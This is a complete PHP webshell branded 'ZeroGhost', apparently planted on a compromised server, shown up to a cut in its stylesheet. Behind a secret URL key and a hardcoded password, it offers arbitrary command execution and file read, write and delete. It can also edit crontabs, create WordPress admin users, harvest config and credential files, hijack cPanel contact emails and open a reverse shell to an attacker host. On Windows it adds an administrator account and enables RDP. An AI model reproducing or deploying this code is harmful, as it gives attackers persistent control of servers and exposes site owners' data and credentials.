File: //var/tmp/fea37e52b24b9815ecfb921177c9763c.php
<?php
session_start();
error_reporting(0);
if (!isset($_SESSION['key_verified'])) {
if (!isset($_GET['key']) || $_GET['key'] !== 'ZGxTW') {
http_response_code(500);
exit;
} else {
$_SESSION['key_verified'] = true;
}
}
// $valid_username = "123123";
$valid_password = "123123";
function isLoggedIn() {
return isset($_SESSION['loggedin']) && $_SESSION['loggedin'] === true;
}
if (isset($_POST['login'])) {
// $username = $_POST['username'] ?? '';
$password = $_POST['password'] ?? '';
if ($password === $valid_password) {
$_SESSION['loggedin'] = true;
// $_SESSION['username'] = $username;
$_SESSION['login_time'] = time();
$_SESSION['ip_address'] = $_SERVER['REMOTE_ADDR'];
header('Location: ' . $_SERVER['PHP_SELF']);
exit;
} else {
$login_error = "Invalid username or password!";
}
}
if (isset($_GET['logout'])) {
session_destroy();
header('Location: ' . $_SERVER['PHP_SELF']);
exit;
}
if (isLoggedIn() && (time() - $_SESSION['login_time']) > 3600) {
session_destroy();
header('Location: ' . $_SERVER['PHP_SELF']);
exit;
}
if (!isLoggedIn()) {
?>
<!DOCTYPE html>
<html>
<head>
<title>ZeroGhost Login</title>
<meta charset="UTF-8">
<link href="https://fonts.googleapis.com/css2?family=Roboto+Mono:wght@300;400;500;700&family=Inter:wght@300;400;500;600;700&display=swap" rel="stylesheet">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
<style>
* {margin: 0; padding: 0; box-sizing: border-box;}
body { background-color: black;font-family: 'Inter', sans-serif;display: flex;justify-content: center;align-items: center;min-height: 100vh;color: #333;}
.login-container {background: #171717;padding: 40px;border-radius: 15px;box-shadow: 0 15px 35px rgba(90, 90, 90, 0.47);width: 100%;max-width: 400px;backdrop-filter: blur(10px);}
.login-header {text-align: center;margin-bottom: 30px;}
.login-header h1 {color: #2c3e50;margin-bottom: 10px;font-size: 28px;}
.login-header p {color: #7f8c8d;font-size: 14px;}
.form-group {margin-bottom: 20px;}
.form-group label {display: block;margin-bottom: 8px;font-weight: 500;color: #2c3e50;}
.form-group input {width: 100%;padding: 12px 15px;border: 2px solid #727272ff;border-radius: 8px;font-size: 14px;transition: all 0.3s ease;background: #171717;}
.form-group input:focus {outline: none;border-color: #004610;box-shadow: 0 0 0 3px rgba(52, 152, 219, 0.1);}
.login-btn {width: 100%;background: linear-gradient(135deg, #004610, #004610);color: gold;border: none;padding: 12px;border-radius: 8px;font-size: 16px;font-weight: 600;cursor: pointer;transition: all 0.3s ease;}
.login-btn:hover {transform: translateY(-2px);box-shadow: 0 5px 15px rgba(27, 146, 226, 0.3);}
.error-message {background: #e74c3c;color: white;padding: 10px;border-radius: 5px;margin-bottom: 20px;text-align: center;font-size: 14px;}
.security-notice {background: #f8f9fa;border: 1px solid #e1e8ed;border-radius: 8px;padding: 15px;margin-top: 20px;font-size: 12px;color: #7f8c8d;}
.image-container {width: 100%;height: 80px;border-radius: 8px;overflow: hidden;margin-bottom: 20px;}
.full-size-image {width: 100%;height: 100%;object-fit: cover;}
</style>
</head>
<body>
<div class="login-container">
<div class="image-container">
<img src="https://takenupload.com/695f48374f175" alt="ZeroGhost" class="full-size-image">
</div>
<div class="login-header">
<p>Secure Access Required</p>
</div>
<?php if (isset($login_error)): ?>
<div class="error-message">
<i class="fas fa-exclamation-triangle"></i> <?php echo $login_error; ?>
</div>
<?php endif; ?>
<form method="post">
<div class="form-group">
<label for="username"><i class="fas fa-user"></i> Username</label>
<input type="text" id="username" name="username" autofocus>
</div>
<div class="form-group">
<label for="password"><i class="fas fa-lock"></i> Password</label>
<input type="password" id="password" name="password" required>
</div>
<button type="submit" name="login" class="login-btn">
<i class="fas fa-sign-in-alt"></i> Login
</button>
</form>
</div>
</body>
</html>
<?php
exit;
}
$current_dir = isset($_GET['dir']) ? $_GET['dir'] : '.';
if (!is_dir($current_dir)) {
$current_dir = '.';
}
$home_dir = realpath(dirname(__FILE__));
if (isset($_POST['ajax'])) {
header('Content-Type: application/json');
if (isset($_POST['action'])) {
switch ($_POST['action']) {
case 'execute_command':
$output = [];
$return_var = 0;
@exec($_POST['command'] . ' 2>&1', $output, $return_var);
echo json_encode([
'success' => true,
'command' => $_POST['command'],
'output' => implode("\n", $output),
'return_var' => $return_var
]);
exit;
case 'get_file_content':
if (isset($_POST['filepath']) && file_exists($_POST['filepath']) && !is_dir($_POST['filepath'])) {
echo json_encode([
'success' => true,
'content' => file_get_contents($_POST['filepath'])
]);
} else {
echo json_encode([
'success' => false,
'error' => 'File not found'
]);
}
exit;
case 'save_file_content':
if (isset($_POST['filepath']) && isset($_POST['content'])) {
if (file_put_contents($_POST['filepath'], $_POST['content']) !== false) {
echo json_encode(['success' => true]);
} else {
echo json_encode(['success' => false, 'error' => 'Failed to save file']);
}
}
exit;
case 'view_crontab':
$output = [];
@exec('crontab -l 2>&1', $output, $return_var);
if ($return_var !== 0) {
echo json_encode([
'success' => false,
'output' => "No crontab for current user or error reading crontab\n" . implode("\n", $output)
]);
} else {
echo json_encode([
'success' => true,
'output' => implode("\n", $output)
]);
}
exit;
case 'save_crontab':
if (isset($_POST['crontab_content'])) {
$temp_file = tempnam(sys_get_temp_dir(), 'crontab');
file_put_contents($temp_file, $_POST['crontab_content']);
@exec('crontab ' . escapeshellarg($temp_file) . ' 2>&1', $output, $return_var);
@unlink($temp_file);
if ($return_var === 0) {
echo json_encode([
'success' => true,
'output' => "Crontab updated successfully!"
]);
} else {
echo json_encode([
'success' => false,
'output' => "Error updating crontab: " . implode("\n", $output)
]);
}
}
exit;
case 'add_wp_user':
$username = $_POST['username'] ?? '';
$password = $_POST['password'] ?? '';
$email = $_POST['email'] ?? '';
$role = $_POST['role'] ?? 'subscriber';
$wp_config_path = $_POST['wp_config_path'] ?? '';
if (!$username || !$password || !$email || !$wp_config_path) {
echo json_encode(['success' => false, 'output' => 'All fields are required']);
exit;
}
$output = addWordPressUser($username, $password, $email, $role, $wp_config_path);
echo json_encode($output);
exit;
case 'scan_ports':
$host = $_POST['host'] ?? 'localhost';
$ports = $_POST['ports'] ?? '21,22,23,25,53,80,110,115,135,139,143,194,443,445,993,995,1433,3306,3389,5432,5900,6379,27017';
$output = scanPorts($host, $ports);
echo json_encode($output);
exit;
case 'scan_webshells':
$scan_path = $_POST['scan_path'] ?? '/var/www';
$output = scanWebshells($scan_path);
echo json_encode($output);
exit;
case 'delete_webshell':
$file_path = $_POST['file_path'] ?? '';
if ($file_path && file_exists($file_path)) {
if (unlink($file_path)) {
echo json_encode(['success' => true, 'output' => 'File deleted successfully']);
} else {
echo json_encode(['success' => false, 'output' => 'Failed to delete file']);
}
} else {
echo json_encode(['success' => false, 'output' => 'File not found']);
}
exit;
case 'get_webshell_code':
$file_path = $_POST['file_path'] ?? '';
if ($file_path && file_exists($file_path)) {
$content = file_get_contents($file_path);
echo json_encode(['success' => true, 'content' => $content]);
} else {
echo json_encode(['success' => false, 'error' => 'File not found']);
}
exit;
case 'backconnect':
$host = $_POST['host'] ?? '';
$port = $_POST['port'] ?? '4444';
$output = backconnect($host, $port);
echo json_encode($output);
exit;
case 'scan_config_files':
$scan_path = $_POST['scan_path'] ?? '/var/www';
$output = scanConfigFiles($scan_path);
echo json_encode($output);
exit;
case 'reset_cpanel':
$email = $_POST['email'] ?? '';
$output = resetCpanel($email);
echo json_encode($output);
exit;
case 'zip_files':
$files = $_POST['files'] ?? [];
$zip_name = $_POST['zip_name'] ?? 'archive.zip';
$output = createZip($files, $zip_name, $current_dir);
echo json_encode($output);
exit;
case 'unzip_file':
$zip_file = $_POST['zip_file'] ?? '';
$extract_path = $_POST['extract_path'] ?? '';
$output = extractZip($zip_file, $extract_path);
echo json_encode($output);
exit;
case 'add_rdp_user':
$username = $_POST['username'] ?? '';
$password = $_POST['password'] ?? '';
$output = addRdpUser($username, $password);
echo json_encode($output);
exit;
case 'enable_rdp':
$output = enableRdp();
echo json_encode($output);
exit;
}
}
exit;
}function addWordPressUser($username, $password, $email, $role, $wp_config_path) {
if (!file_exists($wp_config_path)) {
return ['success' => false, 'output' => 'WordPress config file not found'];
}
$wp_dir = dirname($wp_config_path);
$wp_load = $wp_dir . '/wp-load.php';
if (!file_exists($wp_load)) {
return ['success' => false, 'output' => 'WordPress not found in this directory'];
}
$script = "<?php
define('WP_USE_THEMES', false);
require_once('$wp_load');
if (!function_exists('wp_create_user')) {
echo 'WordPress functions not available';
exit;
}
\$user_id = wp_create_user('$username', '$password', '$email');
if (is_wp_error(\$user_id)) {
echo 'Error: ' . \$user_id->get_error_message();
} else {
\$user = new WP_User(\$user_id);
\$user->set_role('$role');
echo 'User $username created successfully with role: $role';
}
?>";
$temp_script = tempnam(sys_get_temp_dir(), 'wp_user_');
file_put_contents($temp_script, $script);
$output = [];
exec("php " . escapeshellarg($temp_script) . " 2>&1", $output);
unlink($temp_script);
return ['success' => true, 'output' => implode("\n", $output)];
}
function scanPorts($host, $ports) {
$port_list = explode(',', $ports);
$results = [];
foreach ($port_list as $port) {
$port = trim($port);
$connection = @fsockopen($host, $port, $errno, $errstr, 1);
if (is_resource($connection)) {
$results[] = "Port $port: OPEN";
fclose($connection);
} else {
$results[] = "Port $port: CLOSED";
}
}
return ['success' => true, 'output' => implode("\n", $results)];
}
function scanWebshells($path) {
$webshell_patterns = [
'/eval\s*\(.*base64_decode/',
'/system\s*\(/',
'/exec\s*\(/',
'/shell_exec\s*\(/',
'/passthru\s*\(/',
'/popen\s*\(/',
'/proc_open/',
'/assert\s*\(/',
'/preg_replace\s*\(.*\/e/',
'/create_function/',
'/file_put_contents\s*\(.*\$_/',
'/file_get_contents\s*\(.*\$_/',
'/curl_exec/',
'/wget\s+/',
'/phpinfo\s*\(/',
'/gzinflate\s*\(/',
'/str_rot13\s*\(/',
'/gzuncompress\s*\(/',
'/base64_decode\s*\(/',
'/error_reporting\s*\(\s*0\s*\)/',
'/ini_set\s*\(\s*[\'"]display_errors/',
'/@include/'
];
$suspicious_files = [];
if (!is_dir($path)) {
return ['success' => false, 'output' => 'Directory not found'];
}
$iterator = new RecursiveIteratorIterator(
new RecursiveDirectoryIterator($path, RecursiveDirectoryIterator::SKIP_DOTS),
RecursiveIteratorIterator::SELF_FIRST
);
foreach ($iterator as $file) {
if ($file->isFile() && in_array($file->getExtension(), ['php', 'phtml', 'txt', 'html', 'htm'])) {
$content = file_get_contents($file->getPathname());
$matches = [];
foreach ($webshell_patterns as $pattern) {
if (preg_match($pattern, $content)) {
$matches[] = $pattern;
}
}
if (!empty($matches)) {
$suspicious_files[] = [
'path' => $file->getPathname(),
'patterns' => $matches,
'size' => $file->getSize()
];
}
}
}
return ['success' => true, 'files' => $suspicious_files];
}
function backconnect($host, $port) {
$sock = @fsockopen($host, $port, $errno, $errstr, 30);
if (!$sock) {
return ['success' => false, 'output' => "Failed to connect: $errstr ($errno)"];
}
fwrite($sock, "Backconnect established from " . $_SERVER['REMOTE_ADDR'] . "\n");
while (!feof($sock)) {
fwrite($sock, "$ ");
$cmd = fgets($sock);
if (trim($cmd) == 'exit') {
break;
}
$output = shell_exec($cmd);
fwrite($sock, $output);
}
fclose($sock);
return ['success' => true, 'output' => 'Backconnect session completed'];
}
function scanConfigFiles($path) {
$config_patterns = [
'config.php',
'configuration.php',
'wp-config.php',
'config.inc.php',
'settings.php',
'.env',
'config.json',
'config.xml',
'database.yml',
'database.json',
'app.config',
'web.config',
'config.ini',
'.htpasswd',
'.htaccess'
];
$found_files = [];
if (!is_dir($path)) {
return ['success' => false, 'output' => 'Directory not found'];
}
$iterator = new RecursiveIteratorIterator(
new RecursiveDirectoryIterator($path, RecursiveDirectoryIterator::SKIP_DOTS),
RecursiveIteratorIterator::SELF_FIRST
);
foreach ($iterator as $file) {
if ($file->isFile()) {
$filename = $file->getFilename();
foreach ($config_patterns as $pattern) {
if (fnmatch($pattern, $filename) || stripos($filename, 'config') !== false) {
$found_files[] = [
'path' => $file->getPathname(),
'size' => $file->getSize(),
'modified' => date('Y-m-d H:i:s', $file->getMTime())
];
break;
}
}
}
}
return ['success' => true, 'files' => $found_files];
}
function resetCpanel($email) {
$cpanel_dir = '/home/*/.cpanel/contactinfo';
$contact_files = glob($cpanel_dir);
if (empty($contact_files)) {
return ['success' => false, 'output' => 'No cPanel contactinfo files found'];
}
$results = [];
foreach ($contact_files as $file) {
$content = "email: $email\n";
if (file_put_contents($file, $content) !== false) {
$results[] = "Updated: $file";
} else {
$results[] = "Failed: $file";
}
}
return ['success' => true, 'output' => implode("\n", $results)];
}
function createZip($files, $zip_name, $current_dir) {
if (empty($files)) {
return ['success' => false, 'output' => 'No files selected'];
}
$zip_path = $current_dir . '/' . $zip_name;
if (class_exists('ZipArchive')) {
$zip = new ZipArchive();
if ($zip->open($zip_path, ZipArchive::CREATE) === TRUE) {
foreach ($files as $file) {
$file_path = $current_dir . '/' . $file;
if (file_exists($file_path)) {
if (is_dir($file_path)) {
addFolderToZip($zip, $file_path, $file);
} else {
$zip->addFile($file_path, $file);
}
}
}
$zip->close();
return ['success' => true, 'output' => "Zip file created: $zip_path"];
} else {
return ['success' => false, 'output' => 'Failed to create zip file'];
}
} else {
$files_str = implode(' ', array_map('escapeshellarg', $files));
$command = "cd " . escapeshellarg($current_dir) . " && zip -r " . escapeshellarg($zip_name) . " $files_str 2>&1";
exec($command, $output, $return_var);
if ($return_var === 0) {
return ['success' => true, 'output' => "Zip file created: $zip_path\n" . implode("\n", $output)];
} else {
return ['success' => false, 'output' => "Failed to create zip file\n" . implode("\n", $output)];
}
}
}
function addFolderToZip($zip, $folder, $base_name) {
$files = scandir($folder);
foreach ($files as $file) {
if ($file == '.' || $file == '..') continue;
$file_path = $folder . '/' . $file;
$local_path = $base_name . '/' . $file;
if (is_dir($file_path)) {
$zip->addEmptyDir($local_path);
addFolderToZip($zip, $file_path, $local_path);
} else {
$zip->addFile($file_path, $local_path);
}
}
}
function extractZip($zip_file, $extract_path = null) {
if (!file_exists($zip_file)) {
return ['success' => false, 'output' => 'Zip file not found'];
}
if (!$extract_path) {
$extract_path = dirname($zip_file);
}
if (!is_dir($extract_path)) {
mkdir($extract_path, 0755, true);
}
if (class_exists('ZipArchive')) {
$zip = new ZipArchive();
if ($zip->open($zip_file) === TRUE) {
$zip->extractTo($extract_path);
$zip->close();
return ['success' => true, 'output' => "Zip file extracted to: $extract_path"];
} else {
return ['success' => false, 'output' => 'Failed to extract zip file'];
}
} else {
$command = "unzip -o " . escapeshellarg($zip_file) . " -d " . escapeshellarg($extract_path) . " 2>&1";
exec($command, $output, $return_var);
if ($return_var === 0) {
return ['success' => true, 'output' => "Zip file extracted to: $extract_path\n" . implode("\n", $output)];
} else {
return ['success' => false, 'output' => "Failed to extract zip file\n" . implode("\n", $output)];
}
}
}
function addRdpUser($username, $password) {
if (strtoupper(substr(PHP_OS, 0, 3)) !== 'WIN') {
return ['success' => false, 'output' => 'This feature is only available on Windows servers'];
}
$output = [];
$return_var = 0;
exec("net user " . escapeshellarg($username) . " " . escapeshellarg($password) . " /add 2>&1", $output, $return_var);
if ($return_var !== 0) {
return ['success' => false, 'output' => "Failed to create user: " . implode("\n", $output)];
}
exec("net localgroup administrators " . escapeshellarg($username) . " /add 2>&1", $output, $return_var);
if ($return_var !== 0) {
return ['success' => false, 'output' => "User created but failed to add to administrators: " . implode("\n", $output)];
}
return ['success' => true, 'output' => "User $username created and added to administrators group"];
}
function enableRdp() {
if (strtoupper(substr(PHP_OS, 0, 3)) !== 'WIN') {
return ['success' => false, 'output' => 'This feature is only available on Windows servers'];
}
$output = [];
$return_var = 0;
exec('reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 2>&1', $output, $return_var);
if ($return_var !== 0) {
return ['success' => false, 'output' => "Failed to enable RDP: " . implode("\n", $output)];
}
exec('netsh advfirewall firewall set rule group="remote desktop" new enable=Yes 2>&1', $output, $return_var);
return ['success' => true, 'output' => "RDP enabled and firewall configured"];
}
if (isset($_GET['action'])) {
switch ($_GET['action']) {
case 'download':
if (isset($_GET['file']) && file_exists($_GET['file'])) {
$file = $_GET['file'];
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="'.basename($file).'"');
readfile($file);
exit;
}
break;
case 'delete':
if (isset($_GET['file'])) {
if (is_dir($_GET['file'])) {
@rmdir($_GET['file']);
} else {
@unlink($_GET['file']);
}
header('Location: ?dir='.urlencode($current_dir));
exit;
}
break;
case 'chmod':
if (isset($_GET['file']) && isset($_GET['perm'])) {
@chmod($_GET['file'], octdec($_GET['perm']));
header('Location: ?dir='.urlencode($current_dir));
exit;
}
break;
}
}
if (isset($_POST['action']) && !isset($_POST['ajax'])) {
switch ($_POST['action']) {
case 'upload':
if (isset($_FILES['file']) && $_FILES['file']['error'] === 0) {
$target = $current_dir . '/' . $_FILES['file']['name'];
@move_uploaded_file($_FILES['file']['tmp_name'], $target);
header('Location: ?dir='.urlencode($current_dir));
exit;
}
break;
case 'mkdir':
if (isset($_POST['dirname']) && !empty($_POST['dirname'])) {
@mkdir($current_dir . '/' . $_POST['dirname'], 0755);
header('Location: ?dir='.urlencode($current_dir));
exit;
}
break;
case 'newfile':
if (isset($_POST['filename']) && !empty($_POST['filename'])) {
$filepath = $current_dir . '/' . $_POST['filename'];
@file_put_contents($filepath, $_POST['filecontent'] ?? '');
header('Location: ?dir='.urlencode($current_dir));
exit;
}
break;
case 'rename':
if (isset($_POST['oldname']) && isset($_POST['newname'])) {
@rename($_POST['oldname'], $_POST['newname']);
header('Location: ?dir='.urlencode($current_dir));
exit;
}
break;
}
}
function is_writable_dir($dir) {
if (!is_dir($dir)) return false;
$test_file = $dir . '/test_' . uniqid() . '.tmp';
$result = @file_put_contents($test_file, 'test');
if ($result !== false) {
@unlink($test_file);
return true;
}
return false;
}
?>
<!DOCTYPE html>
<html>
<head>
<title>ZeroGhost</title>
<meta charset="UTF-8">
<link href="https://fonts.googleapis.com/css2?family=Roboto+Mono:wght@300;400;500;700&family=Inter:wght@300;400;500;600;700&display=swap" rel="stylesheet">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
<style>
:root {--primary: #f8f9fa;--secondary: #3498db;--accent: #e74c3c;--success: #27ae60;--warning: #f39c12;--info: #17a2b8;--dark: #1a1a1a;--light: #f8f9fa;--sidebar-bg: #17181aff;--card-bg: #2c3e50;--border-color: #dee2e6;--text-primary: #fff;--text-secondary: #6c757d;--shadow: 0 4px 6px rgba(0, 0, 0, 0.1);--transition: all 0.3s ease;}
* { margin: 0; padding: 0; box-sizing: border-box;}
body { background: linear-gradient(135deg, #f5f7fa 0%, #c3cfe2 100%);color: var(--text-primary);font-family: 'Inter', sans-serif;line-height: 1.6;font-size: 14px;min-height: 100vh;}
.container { display: flex; min-height: 100vh;}
.sidebar { width: 280px;background: var(--sidebar-bg);padding: 20px;position: sticky;top: 0;align-self: flex-start;height: 100vh;overflow-y: auto;box-shadow: var(--shadow);z-index: 100;}
.main { flex: 1; padding: 25px; background: var(--sidebar-bg);overflow-y: auto;}
.header {background: var(--card-bg);padding: 20px; margin-bottom: 25px; border-radius: 10px;color: var(--text-primary);border: none;box-shadow: var(--shadow);position: relative;overflow: hidden;display: flex;justify-content: space-between;align-items: center;flex-wrap: wrap;}
.header::before {content: '';position: absolute;top: 0;left: 0;width: 100%;height: 4px;background: linear-gradient(90deg, var(--secondary), var(--accent));}
.header h1 {margin: 0;font-size: 28px;}
.header-icons {display: flex;gap: 15px;align-items: center;}
.header-icon {display: flex;align-items: center;justify-content: center;width: 20px;height: 20px;background: rgba(255, 255, 255, 0.1);border-radius: 50%;color: white;text-decoration: none;transition: var(--transition);font-size: 16px;border: 1px solid var(--border-color);}
.header-icon:hover {background: var(--secondary);color: white;transform: translateY(-2px);box-shadow: 0 4px 8px rgba(0,0,0,0.2);}
.login-info {background: linear-gradient(135deg, #667eea 0%, #764ba2 100%);color: white;padding: 8px 15px;border-radius: 20px;font-size: 12px;display: flex;align-items: center;gap: 8px;margin-left: auto;}
.logout-btn {background: rgba(255,255,255,0.2);color: white;border: 1px solid rgba(255,255,255,0.3);padding: 5px 12px;border-radius: 15px;text-decoration: none;font-size: 11px;transition: all 0.3s ease;margin-left: 10px;}
.logout-btn:hover {background: rgba(255,255,255,0.3);transform: translateY(-1px);}
.section { background: var(--card-bg); margin-bottom: 20px; padding: 20px;border-radius: 10px;box-shadow: var(--shadow);border: none;}
.file-list { margin: 15px 0;}
.file-item { padding: 12px 15px; border-bottom: 1px solid var(--border-color); display: flex; align-items: center;transition: var(--transition);flex-wrap: wrap;border-radius: 5px;position: relative;cursor: pointer;}
.file-item:hover { background: #253342ff; transform: translateY(-2px);box-shadow: 0 2px 5px rgba(0,0,0,0.05);}
.file-item.selected {background: #253342ff;border-left: 3px solid var(--secondary);color: #fff;}
.file-name { flex: 1; font-size: 14px; font-family: 'Roboto Mono', monospace; min-width: 200px;word-break: break-all;display: flex;align-items: center;gap: 8px;}
.file-actions { display: flex; gap: 8px; flex-wrap: wrap;margin: 5px 0;}
.btn { background: var(--secondary); color: #ffffff; border: none; padding: 8px 14px; cursor: pointer; text-decoration: none; font-size: 12px; font-family: 'Inter', sans-serif;border-radius: 5px;transition: var(--transition);font-weight: 500;white-space: nowrap;display: inline-flex;align-items: center;gap: 5px;box-shadow: 0 2px 4px rgba(0,0,0,0.1);}
.btn:hover { transform: translateY(-2px);box-shadow: 0 4px 8px rgba(0,0,0,0.15);}
.btn:disabled {background: #adb5bd;cursor: not-allowed;transform: none;box-shadow: none;}
.btn-danger { background: var(--accent);}
.btn-success { background: var(--success);}
.btn-warning { background: var(--warning); color: #000;}
.btn-info { background: var(--info);}
.btn-secondary { background: var(--text-secondary);}
.btn-primary {background: var(--primary);}
input, textarea, select { background: #ffffff; color: var(--text-primary); border: 1px solid var(--border-color); padding: 10px; margin: 5px 0;font-family: 'Roboto Mono', monospace;border-radius: 5px;width: 100%;font-size: 14px;transition: var(--transition);}
input:focus, textarea:focus, select:focus {outline: none;border-color: var(--secondary);box-shadow: 0 0 0 3px rgba(52, 152, 219, 0.2);}
.terminal { background: var(--card-bg); border: none; padding: 15px;border-radius: 10px;box-shadow: var(--shadow);}
.terminal-output { background: #2c3e50; color: #ecf0f1; height: 400px; overflow-y: auto; overflow-x: auto;padding: 15px; border: none; margin-bottom: 15px; font-family: 'Roboto Mono', monospace;font-size: 13px;border-radius: 5px;white-space: pre-wrap;word-wrap: break-word;}
.terminal-input { width: 100%; background: #ffffff; color: var(--text-primary); border: 1px solid var(--border-color); padding: 12px;font-family: 'Roboto Mono', monospace;border-radius: 5px;font-size: 14px;}
.modal { display: none; position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: rgba(0,0,0,0.5); z-index: 1000;backdrop-filter: blur(5px);}
.modal-content { background: var(--card-bg); margin: 40px auto; padding: 30px; border: none;width: 90%; max-width: 800px; max-height: 85vh; overflow-y: auto;border-radius: 10px;box-shadow: 0 10px 25px rgba(0,0,0,0.2);position: relative;}
.modal-content::before {content: '';position: absolute;top: 0;left: 0;width: 100%;height: 4px;background: linear-gradient(90deg, var(--secondary), var(--accent));border-radius: 10px 10px 0 0;}
.breadcrumb { margin-bottom: 20px; padding: 15px; background: var(--card-bg); border: none;border-radius: 10px;font-family: 'Roboto Mono', monospace;font-size: 13px;word-break: break-all;box-shadow: var(--shadow);display: flex;align-items: center;flex-wrap: wrap;gap: 10px;}
.breadcrumb a { color: var(--secondary); text-decoration: none; font-weight: 500;}
.breadcrumb a:hover { text-decoration: underline; color: var(--text-secondary);}
.current-path { background: var(--card-bg); padding: 12px; border: none; margin: 15px 0; font-family: 'Roboto Mono', monospace;border-radius: 5px;font-size: 13px;word-break: break-all;box-shadow: var(--shadow);}
.home-btn { background: var(--secondary); color: white; border: none; padding: 8px 16px; cursor: pointer; text-decoration: none; display: inline-flex;align-items: center;gap: 5px;margin-left: 15px;border-radius: 5px;font-weight: 500;transition: var(--transition);font-size: 13px;}
.bayy { background: var(--border-color); color: white; border: none; padding: 8px 16px; cursor: pointer; text-decoration: none; display: inline-flex;align-items: center;gap: 5px;margin-left: 15px;border-radius: 5px;font-weight: 500;transition: var(--transition);font-size: 13px;}
.home-btn:hover { background: #2980b9;text-decoration: none;color: #ffffff;transform: translateY(-2px);}
.file-info { font-size: 11px; color: var(--text-secondary); margin-left: 15px; font-family: 'Roboto Mono', monospace; display: flex;flex-direction: column;gap: 2px;}
.dir-link { color: var(--secondary); text-decoration: none; font-weight: 500; display: flex;align-items: center;gap: 5px;}
.dir-link:hover { text-decoration: underline; color: var(--primary);}
.icon-folder { color: var(--warning);}
.icon-file { color: var(--info);}
.toolbar { display: flex; gap: 10px; margin-bottom: 20px; flex-wrap: wrap;}
.system-info {background: var(--card-bg);color: var(--text-primary);padding: 15px;border-radius: 10px;margin-bottom: 20px;font-family: 'Roboto Mono', monospace;font-size: 12px;border: none;word-break: break-all;box-shadow: var(--shadow);position: relative;overflow: hidden;}
.system-info::before {content: '';position: absolute;top: 0;left: 0;width: 4px;height: 100%;background: linear-gradient(to bottom, var(--secondary), var(--accent));}
h1, h2, h3, h4, h5, h6 {font-family: 'Inter', sans-serif;font-weight: 600;color: var(--text-primary);margin-bottom: 15px;}
.nano-editor {background: #2c3e50;color: #ecf0f1;border: none;padding: 10px;font-family: 'Roboto Mono', monospace;width: 100%;height: 500px;resize: both;overflow: auto;font-size: 13px;border-radius: 5px;}
.nano-header {background: #34495e;padding: 10px;border-bottom: 1px solid #2c3e50;font-family: 'Roboto Mono', monospace;margin-bottom: 10px;color: #ecf0f1;font-size: 13px;border-radius: 5px 5px 0 0;}
.tab-container {margin-bottom: 20px;}
.tab-buttons {display: flex;border-bottom: 2px solid var(--border-color);flex-wrap: wrap;background: var(--card-bg);border-radius: 10px 10px 0 0;padding: 5px 5px 0 5px;box-shadow: var(--shadow);}
.tab-button {padding: 12px 24px;background: transparent;border: none;cursor: pointer;margin-right: 5px;border-radius: 5px 5px 0 0;font-family: 'Inter', sans-serif;font-weight: 500;color: var(--text-secondary);transition: var(--transition);position: relative;}
.tab-button.active {background: var(--card-bg);color: var(--primary);font-weight: 600;}
.tab-button.active::after {content: '';position: absolute;bottom: -2px;left: 0;width: 100%;height: 3px;background: var(--secondary);border-radius: 3px 3px 0 0;}
.tab-button:hover {background: rgba(52, 152, 219, 0.1);color: var(--secondary);}
.tab-content {display: none;padding: 20px;border: none;background: var(--card-bg);border-radius: 0 0 10px 10px;box-shadow: var(--shadow);}
.tab-content.active {display: block;}
pre {white-space: pre-wrap;word-wrap: break-word;font-family: 'Roboto Mono', monospace;font-size: 13px;margin: 10px 0;}
.command-history {background: #ecf0f1;border: 1px solid #bdc3c7;border-radius: 5px;padding: 5px;margin-bottom: 10px;font-size: 12px;max-height: 100px;overflow-y: auto;}
.command-item {padding: 2px 5px;cursor: pointer;border-radius: 3px;transition: var(--transition);}
.command-item:hover {background: #d5dbdb;}
.loading {opacity: 0.6;pointer-events: none;}
.terminal-prompt {color: var(--success);font-weight: bold;}
.terminal-output-line {margin: 2px 0;}
.webshell-item {background: #fff3cd;border: 1px solid #ffeaa7;border-radius: 5px;padding: 10px;margin: 5px 0;transition: var(--transition);}
.webshell-item:hover {transform: translateY(-2px);box-shadow: 0 2px 5px rgba(0,0,0,0.1);}
.config-item {background: #d1ecf1;border: 1px solid #bee5eb;border-radius: 5px;padding: 10px;margin: 5px 0;transition: var(--transition);}
.config-item:hover {transform: translateY(-2px);box-shadow: 0 2px 5px rgba(0,0,0,0.1);}
.code-preview {background: #2b2b2b;color: #f8f8f2;padding: 10px;border-radius: 5px;font-family: 'Roboto Mono', monospace;font-size: 12px;max-height: 300px;overflow-y: auto;margin: 10px 0;}
.sidebar-logo {text-align: center;margin-bottom: 20px;padding-bottom: 20px;border-bottom: 1px solid rgba(255,255,255,0.1);}
.sidebar-logo h2 {color: white;font-size: 22px;margin-bottom: 5px;}
.sidebar-logo p {color: rgba(255,255,255,0.7);font-size: 12px;}
.sidebar-section {margin-bottom: 25px;}
.sidebar-section h4 {color: #999;margin-bottom: 12px;font-size: 14px;text-transform: uppercase;letter-spacing: 1px;display: flex;align-items: center;gap: 8px;}
.sidebar-section h4 i {color: var(--secondary);}
.sidebar-buttons {display: flex;flex-direction: column;gap: 8px;}
.sidebar-btn {background: rgba(255,255,255,0.1);color: white;border: none;padding: 10px 15px;border-radius: 5px;text-align: left;cursor: pointer;transition: var(--transition);display: flex;align-items: center;gap: 10px;font-size: 13px;}
.sidebar-btn:hover {background: rgba(255,255,255,0.2);transform: translateX(5px);}
.sidebar-btn i {width: 20px;text-align: center;}
.info-row {display: flex;align-items: center;margin-bottom: 8px;min-height: 20px;}
.info-label {width: 140px;flex-shrink: 0;font-weight: 600;color: var(--primary);}
.info-value {flex: 1;word-break: break-all;color: var(--text-secondary);font-weight: normal;}
.image-container {width: 100%;height: 55px; border-radius: 5px;overflow: hidden;margin-bottom: 15px;}
.full-size-image {width: 100%;height: 100%;object-fit: cover; display: block;}
.status-indicator {display: inline-block;width: 8px;height: 8px;border-radius: 50%;margin-right: 5px;}
.status-online {background: var(--success);}
.status-offline {background: var(--accent);}
.card {background: var(--card-bg);border-radius: 10px;padding: 15px;margin-bottom: 15px;box-shadow: var(--shadow);transition: var(--transition);}
.card:hover {transform: translateY(-3px);box-shadow: 0 6px 12px rgba(0,0,0,0.1);}
.card-header {display: flex;justify-content: between;align-items: center;margin-bottom: 10px;padding-bottom: 10px;border-bottom: 1px solid var(--border-color);}
.card-title {font-weight: 600;color: var(--primary);margin: 0;}
